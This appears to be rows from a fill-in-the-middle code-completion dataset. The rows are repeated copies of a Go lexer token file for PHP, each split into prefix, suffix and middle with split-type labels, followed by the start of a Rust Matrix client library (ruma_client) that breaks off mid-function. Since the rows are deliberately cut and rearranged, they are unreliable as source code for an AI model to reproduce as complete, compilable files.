ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok {
return t
}
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
} | EncapsedAndWhitespace | random_line_split |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml
EncapsedAndWhitespace
ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok |
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
}
| {
return t
} | conditional_block |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml
EncapsedAndWhitespace
ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) | () string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok {
return t
}
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
}
| String | identifier_name |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> |
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
